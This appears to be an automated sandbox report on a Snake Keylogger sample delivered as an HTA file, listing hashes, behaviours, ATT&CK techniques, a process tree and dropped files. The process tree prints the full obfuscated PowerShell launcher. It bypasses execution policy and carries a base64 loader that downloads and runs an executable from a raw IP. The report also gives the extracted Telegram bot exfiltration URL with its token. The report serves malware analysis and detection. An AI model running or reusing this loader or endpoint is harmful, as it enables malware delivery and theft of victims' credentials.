snakekeylogger | 4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-10-2024 01:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
Size

165KB
MD5

44ad3c49b38f4f6f1739baf86d528fd3
SHA1

afcf27df0ee2373846a1f6b8027e9cfcea77c486
SHA256

4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
SHA512

e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
SSDEEP

96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/4696-90-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	772	PoweRsHELl.ExE

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
772	PoweRsHELl.ExE
2124	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
2860	taskhostw.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000b000000023b84-74.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2860 set thread context of 4696	2860	taskhostw.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRsHELl.ExE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
772	PoweRsHELl.ExE
772	PoweRsHELl.ExE
2124	powershell.exe
2124	powershell.exe
4696	RegSvcs.exe
4696	RegSvcs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2860	taskhostw.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	772	PoweRsHELl.ExE
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	4696	RegSvcs.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 3256 wrote to memory of 772	3256	mshta.exe	85
PID 3256 wrote to memory of 772	3256	mshta.exe	85
PID 3256 wrote to memory of 772	3256	mshta.exe	85
PID 772 wrote to memory of 2124	772	PoweRsHELl.ExE	89
PID 772 wrote to memory of 2124	772	PoweRsHELl.ExE	89
PID 772 wrote to memory of 2124	772	PoweRsHELl.ExE	89
PID 772 wrote to memory of 1940	772	PoweRsHELl.ExE	93
PID 772 wrote to memory of 1940	772	PoweRsHELl.ExE	93
PID 772 wrote to memory of 1940	772	PoweRsHELl.ExE	93
PID 1940 wrote to memory of 648	1940	csc.exe	95
PID 1940 wrote to memory of 648	1940	csc.exe	95
PID 1940 wrote to memory of 648	1940	csc.exe	95
PID 772 wrote to memory of 2860	772	PoweRsHELl.ExE	98
PID 772 wrote to memory of 2860	772	PoweRsHELl.ExE	98
PID 772 wrote to memory of 2860	772	PoweRsHELl.ExE	98
PID 2860 wrote to memory of 4696	2860	taskhostw.exe	99
PID 2860 wrote to memory of 4696	2860	taskhostw.exe	99
PID 2860 wrote to memory of 4696	2860	taskhostw.exe	99
PID 2860 wrote to memory of 4696	2860	taskhostw.exe	99

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256
- C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
  "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upyaxiqs\upyaxiqs.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB054.tmp" "c:\Users\Admin\AppData\Local\Temp\upyaxiqs\CSC72648FF7DFE243839548E0CE4642788.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:648
- - C:\Users\Admin\AppData\Roaming\taskhostw.exe
    "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoweRsHELl.ExE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e6cdfea27d70242a9b6934ea227d8b7d

SHA1
00747deb2dfd8db74300702468199f737ee3abcc

SHA256
e824b1d7d29b3cf0e518571eeaeef902b68d7c5c26f193122dfa3f03e15aed42

SHA512
969b6b2dbf9f0d28dab21121e7adee9892632d145a73a8730d39b3cf590cd5d4350a85683c220be28d5abcaf82ed795718c613d0e98f8d5feceec39ce8714b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB054.tmp

Filesize
1KB

MD5
4164c6c34710670605f609249d20d82a

SHA1
73d79b1b9bd03c3b708b82128278d1dd189f8103

SHA256
24d8b7619fd5b4fdd3f63b838370dd616fa03745069151e0a5443e8c1b95ff95

SHA512
a85c699832692cddbad083a96dae6e2e9b039dc8a11941996a60d2a83f671cb7e713b98d0d12de7f7a8c899f944cb7c208ae781fb3f25a1c55eb3cde2ae11ebf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yzrtfsr.2lj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\upyaxiqs\upyaxiqs.dll

Filesize
3KB

MD5
a8c1b83835a4b540b879f2308ad810a4

SHA1
1eac1fbebcddf6f0324f42a247258020dad67f49

SHA256
4cc471b19f7d4bc201caa59e7ca643faa619243bdccd29b99c7d230122be9c50

SHA512
ad2d547ed29d3e9e6e449a8ca69d46ed645415840ac4d6d29652eb11bbfe34b3c4270461c8ad7cfa627685be2a39640cb56cde5da60d582922a0cc477717536d

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
948KB

MD5
3e2f27edd3deacd8f08f6ed1133b2040

SHA1
060e3218949c5a006bb8607e8228e6539b737bfb

SHA256
163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

SHA512
da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\upyaxiqs\CSC72648FF7DFE243839548E0CE4642788.TMP

Filesize
652B

MD5
31e4ea0b6e9f53b01f3f62d4f6fddbb1

SHA1
f8f9d0dd2f1084fcc135f65b389c605a868526d9

SHA256
4326b0751eb1dc2abfe8affd7a197fc20e8f6c1637a4780cbc78d40ead18ceea

SHA512
3374c75172bd5a5ccfb6944e18ee11b11cbdb1b6a1698e59c4480b0fe4b0c519f6a5cfbd672472c2b9fa4f415ff997761e3b3b9c6e3811404077e56bb075907c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\upyaxiqs\upyaxiqs.0.cs

Filesize
475B

MD5
ecc2c10cb4c5954e2d5156bce54e41f4

SHA1
2d7cde31f9942c1dc80c493c03d675962991bf31

SHA256
21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

SHA512
bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\upyaxiqs\upyaxiqs.cmdline

Filesize
369B

MD5
784f53ab1897e19293b9212b5afaadf9

SHA1
bd23c6b7e37d46c2418a95f33827a896411a1302

SHA256
57fc1823a9536f3de80c02a48300821052c9524c33c3f6355b303bc3b22b9ea2

SHA512
70ca938cd5c13f5e107853d3f424936d37741548e98d97fb4d92119fa4407ab03e9fbe97717e4a871f87a574cb715e92406ad93c6eeab39ae96c9504cd561e07

Download Submit
memory/772-88-0x0000000071580000-0x0000000071D30000-memory.dmp

Filesize
7.7MB

Download
memory/772-73-0x00000000085E0000-0x0000000008B84000-memory.dmp

Filesize
5.6MB

Download
memory/772-0-0x000000007158E000-0x000000007158F000-memory.dmp

Filesize
4KB

Download
memory/772-17-0x0000000006280000-0x000000000629E000-memory.dmp

Filesize
120KB

Download
memory/772-7-0x0000000005C70000-0x0000000005FC4000-memory.dmp

Filesize
3.3MB

Download
memory/772-6-0x0000000005C00000-0x0000000005C66000-memory.dmp

Filesize
408KB

Download
memory/772-5-0x0000000005550000-0x00000000055B6000-memory.dmp

Filesize
408KB

Download
memory/772-18-0x00000000062B0000-0x00000000062FC000-memory.dmp

Filesize
304KB

Download
memory/772-72-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download
memory/772-71-0x0000000071580000-0x0000000071D30000-memory.dmp

Filesize
7.7MB

Download
memory/772-70-0x000000007158E000-0x000000007158F000-memory.dmp

Filesize
4KB

Download
memory/772-4-0x00000000053B0000-0x00000000053D2000-memory.dmp

Filesize
136KB

Download
memory/772-64-0x0000000006910000-0x0000000006918000-memory.dmp

Filesize
32KB

Download
memory/772-2-0x0000000071580000-0x0000000071D30000-memory.dmp

Filesize
7.7MB

Download
memory/772-3-0x00000000055D0000-0x0000000005BF8000-memory.dmp

Filesize
6.2MB

Download
memory/772-1-0x0000000002A40000-0x0000000002A76000-memory.dmp

Filesize
216KB

Download
memory/2124-28-0x00000000063F0000-0x0000000006422000-memory.dmp

Filesize
200KB

Download
memory/2124-49-0x00000000073C0000-0x00000000073C8000-memory.dmp

Filesize
32KB

Download
memory/2124-48-0x0000000007490000-0x00000000074AA000-memory.dmp

Filesize
104KB

Download
memory/2124-47-0x0000000007380000-0x0000000007394000-memory.dmp

Filesize
80KB

Download
memory/2124-46-0x0000000007370000-0x000000000737E000-memory.dmp

Filesize
56KB

Download
memory/2124-45-0x0000000007340000-0x0000000007351000-memory.dmp

Filesize
68KB

Download
memory/2124-44-0x00000000073D0000-0x0000000007466000-memory.dmp

Filesize
600KB

Download
memory/2124-43-0x00000000071A0000-0x00000000071AA000-memory.dmp

Filesize
40KB

Download
memory/2124-42-0x0000000007140000-0x000000000715A000-memory.dmp

Filesize
104KB

Download
memory/2124-41-0x0000000007790000-0x0000000007E0A000-memory.dmp

Filesize
6.5MB

Download
memory/2124-40-0x0000000007000000-0x00000000070A3000-memory.dmp

Filesize
652KB

Download
memory/2124-39-0x00000000063D0000-0x00000000063EE000-memory.dmp

Filesize
120KB

Download
memory/2124-29-0x000000006DE40000-0x000000006DE8C000-memory.dmp

Filesize
304KB

Download
memory/4696-90-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/4696-91-0x0000000005780000-0x000000000581C000-memory.dmp

Filesize
624KB

Download
memory/4696-92-0x0000000006910000-0x0000000006960000-memory.dmp

Filesize
320KB

Download
memory/4696-93-0x0000000006B30000-0x0000000006CF2000-memory.dmp

Filesize
1.8MB

Download
memory/4696-94-0x0000000006A00000-0x0000000006A92000-memory.dmp

Filesize
584KB

Download
memory/4696-95-0x0000000006960000-0x000000000696A000-memory.dmp

Filesize
40KB

Download